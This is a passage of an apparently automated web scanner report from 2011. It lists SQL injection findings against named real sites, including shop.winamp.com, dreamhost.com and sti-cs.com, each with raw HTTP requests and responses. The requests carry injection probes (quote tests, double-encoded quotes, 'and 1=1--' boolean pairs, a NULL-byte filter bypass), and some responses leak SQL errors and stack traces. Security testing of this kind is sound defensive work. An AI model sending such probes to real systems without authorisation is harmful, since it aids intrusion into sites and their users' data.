Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500%2527%2527
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=67280272104,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:46:06 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59


1.22. http://shop.winamp.com/store [s_pers cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Remediation detail

There is probably no need to perform a second URL-decode of the value of the s_pers cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B%2527; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131704869494,0)
Date: Sun, 27 Feb 2011 17:47:32 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 24205


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
-!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>javax.servlet.ServletException: Required Page Parameter: productID not provided
   at com.digitalriver.system.controller.SiteflowPlugin.appendURLParamsAndSection(SiteflowPlugin.java:283)
   at com.digitalriver.system.controller.Siteflo
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B%2527%2527; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=131704869912,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:47:33 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59


1.23. http://shop.winamp.com/store [s_sess cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Remediation detail

There is probably no need to perform a second URL-decode of the value of the s_sess cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%2527

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131704872526,0)
Date: Sun, 27 Feb 2011 17:47:36 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 24205


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
-!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>javax.servlet.ServletException: Required Page Parameter: productID not provided
   at com.digitalriver.system.controller.SiteflowPlugin.appendURLParamsAndSection(SiteflowPlugin.java:283)
   at com.digitalriver.system.controller.Siteflo
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%2527%2527

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=131704873667,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:47:36 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59


1.24. https://shop.winamp.com/store [BIGipServerp-drh-dc1pod5-pool1-active cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://shop.winamp.com
Path:   /store

Request 1

GET /store?Action=DisplayPage&Locale=en_US&SiteID=winamp&id=QuickBuyCartPage HTTP/1.1
Host: shop.winamp.com
Connection: keep-alive
Referer: http://forums.winamp.com/login.php?do=login
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000'

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=114525008612,0)
Date: Sun, 27 Feb 2011 17:47:40 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 82107


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<pre>java.lang.RuntimeException: java.lang.RuntimeException: java.lang.RuntimeException: Error serving pageContext.
   at com.digitalriver.site.taglib.StyleTag.doStartTagInternal(StyleTag.java:47)
   at com.digitalriver.taglib.TagProfil
...[SNIP]...

Request 2

GET /store?Action=DisplayPage&Locale=en_US&SiteID=winamp&id=QuickBuyCartPage HTTP/1.1
Host: shop.winamp.com
Connection: keep-alive
Referer: http://forums.winamp.com/login.php?do=login
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000''

Response 2

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, private
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Location: http://shop.winamp.com:80/store?Action=DisplayPage&Env=BASE&Locale=en_US&SiteID=winamp&id=QuickBuyCartPage
Content-Type: text/plain
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=24330695573,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:47:40 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59


1.25. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/QsQtRaU6mGT.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yF/r/QsQtRaU6mGT.css

Request 1

GET /rsrc.php/v1/yF/r'%20and%201%3d1--%20/QsQtRaU6mGT.css HTTP/1.1
Host: static.ak.fbcdn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 7
Content-Type: text/html; charset=utf-8
X-Bad-Checksum: yF
X-Powered-By: HPHP
X-FB-Server: 10.138.64.184
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Sun, 27 Feb 2011 23:10:57 GMT
Date: Sat, 26 Feb 2011 23:10:57 GMT
Connection: close

/*bcs*/

Request 2

GET /rsrc.php/v1/yF/r'%20and%201%3d2--%20/QsQtRaU6mGT.css HTTP/1.1
Host: static.ak.fbcdn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 403 Forbidden
X-Bad-Prefix: /v1/yF/r' and 1=2-- /QsQtRaU6mGT.css
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.138.17.183
Content-Length: 0
Vary: Accept-Encoding
Expires: Sat, 26 Feb 2011 23:10:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Feb 2011 23:10:57 GMT
Connection: close


1.26. http://www.capgemini.com/insights-and-resources/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.capgemini.com
Path:   /insights-and-resources/

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /insights-and-resources/?1%2527=1 HTTP/1.1
Host: www.capgemini.com
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/news-and-events/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __llat=aHR0cDovL3d3dy5jYXBnZW1pbmkuY29tLz9jb21wYW55PWNhcGdlbWluaSZkYXRlPU1vbiwgMjggRmViIDIwMTEgMTc6NTA6MTYgVVRDJmlwYWRkcj1Ob25lJmJyb3dzZXI9TmV0c2NhcGUlMjA1LjAlMjAlMjhXaW5kb3dzJTNCJTIwVSUzQiUyMFdpbmRvd3MlMjBOVCUyMDYuMSUzQiUyMGVuLVVTJTI5JTIwQXBwbGVXZWJLaXQvNTM0LjEzJTIwJTI4S0hUTUwlMkMlMjBsaWtlJTIwR2Vja28lMjklMjBDaHJvbWUvOS4wLjU5Ny45OCUyMFNhZmFyaS81MzQuMTMmcmVmZXJyZXI9JmNhbXBhaWduPVdlYlNpdGUgTGVhZHM=; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 504 Gateway Time-out
Server: nginx/0.6.35
Date: Mon, 28 Feb 2011 17:53:08 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 383
Connection: keep-alive

<html>
<head>
<title>The page is temporarily unavailable</title>
<style>
body { font-family: Tahoma, Verdana, Arial, sans-serif; }
</style>
</head>
<body bgcolor="white" text="black">
<table width="10
...[SNIP]...

Request 2

GET /insights-and-resources/?1%2527%2527=1 HTTP/1.1
Host: www.capgemini.com
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/news-and-events/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __llat=aHR0cDovL3d3dy5jYXBnZW1pbmkuY29tLz9jb21wYW55PWNhcGdlbWluaSZkYXRlPU1vbiwgMjggRmViIDIwMTEgMTc6NTA6MTYgVVRDJmlwYWRkcj1Ob25lJmJyb3dzZXI9TmV0c2NhcGUlMjA1LjAlMjAlMjhXaW5kb3dzJTNCJTIwVSUzQiUyMFdpbmRvd3MlMjBOVCUyMDYuMSUzQiUyMGVuLVVTJTI5JTIwQXBwbGVXZWJLaXQvNTM0LjEzJTIwJTI4S0hUTUwlMkMlMjBsaWtlJTIwR2Vja28lMjklMjBDaHJvbWUvOS4wLjU5Ny45OCUyMFNhZmFyaS81MzQuMTMmcmVmZXJyZXI9JmNhbXBhaWduPVdlYlNpdGUgTGVhZHM=; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Mon, 28 Feb 2011 17:53:39 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.8
Set-Cookie: PHPSESSID=57d2060e2e51cf867b08903369d05a3c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 32547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE 6]>
<html class="msie6" xmlns="http://www.w3.org/1999/xh
...[SNIP]...

1.27. http://www.companypond.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.companypond.com
Path:   /

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /?1%00'=1 HTTP/1.1
Host: www.companypond.com
Proxy-Connection: keep-alive
Referer: http://adam.companypond.com/peeps.php?email=4240be8e2dc90b4aef080848af60435f&bio=no
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:16 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=fa03e4bec9c60463fc37a80107a29a5b; path=/
X-Ua-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 73454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs">
<head>
<meta htt
...[SNIP]...
Marketing Company based in Morristown, NJ with offices in Miami, FL. Our primary focus is helping small to medium sized businesses achieve online marketing success. Our clients come to Optimum7 after failing to achieve their marketing objectives online and...
        <a href="/optimum7" title="Profile for optimum7">
...[SNIP]...

Request 2

GET /?1%00''=1 HTTP/1.1
Host: www.companypond.com
Proxy-Connection: keep-alive
Referer: http://adam.companypond.com/peeps.php?email=4240be8e2dc90b4aef080848af60435f&bio=no
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=fdc0940037a69faf36c2ec348d2ba8d4; path=/
X-Ua-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 66519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs">
<head>
<meta htt
...[SNIP]...

1.28. http://www.dreamhost.com/r.cgi [129733 parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dreamhost.com
Path:   /r.cgi

Request 1

GET /r.cgi?129733' HTTP/1.1
Host: www.dreamhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 502 Bad Gateway
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:19:38 GMT
Content-Type: text/html
Connection: close
Content-Length: 575

<html>
<head><title>502 Bad Gateway</title></head>
<body bgcolor="white">
<center><h1>502 Bad Gateway</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
...[SNIP]...

Request 2

GET /r.cgi?129733'' HTTP/1.1
Host: www.dreamhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 302 Found
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:19:39 GMT
Content-Type: text/plain
Connection: close
Set-Cookie: referrer=; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:20 GMT
Set-Cookie: referred=rewards%7C129733%27%27; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:21 GMT
Set-Cookie: redir=12722601; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:21 GMT
Location: http://www.dreamhost.com/
Content-Length: 0


1.29. http://www.dreamhost.com/r.cgi [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dreamhost.com
Path:   /r.cgi

Request 1

GET /r.cgi?1'=1 HTTP/1.1
Host: www.dreamhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 502 Bad Gateway
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:19:36 GMT
Content-Type: text/html
Connection: close
Content-Length: 575

<html>
<head><title>502 Bad Gateway</title></head>
<body bgcolor="white">
<center><h1>502 Bad Gateway</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
...[SNIP]...

Request 2

GET /r.cgi?1''=1 HTTP/1.1
Host: www.dreamhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 302 Found
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:19:37 GMT
Content-Type: text/plain
Connection: close
Set-Cookie: referrer=; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:19 GMT
Set-Cookie: referred=rewards%7C1%27%27%3D1; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:19 GMT
Set-Cookie: redir=12722600; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:19 GMT
Location: http://www.dreamhost.com/
Content-Length: 0


1.30. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-24/page-1/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /Portfolio/Trades-and-Exhibits/id-24'/page-1/ HTTP/1.1
Host: www.sti-cs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:18:56 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 14497

...


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
<title>Trades and Exhibits :: STI - Creative Services</title>

<script type="text/javascript" language="javascript
...[SNIP]...
</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>
...[SNIP]...

1.31. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-25/page-1/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-25/page-1/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /Portfolio/Trades-and-Exhibits/id-25'/page-1/ HTTP/1.1
Host: www.sti-cs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
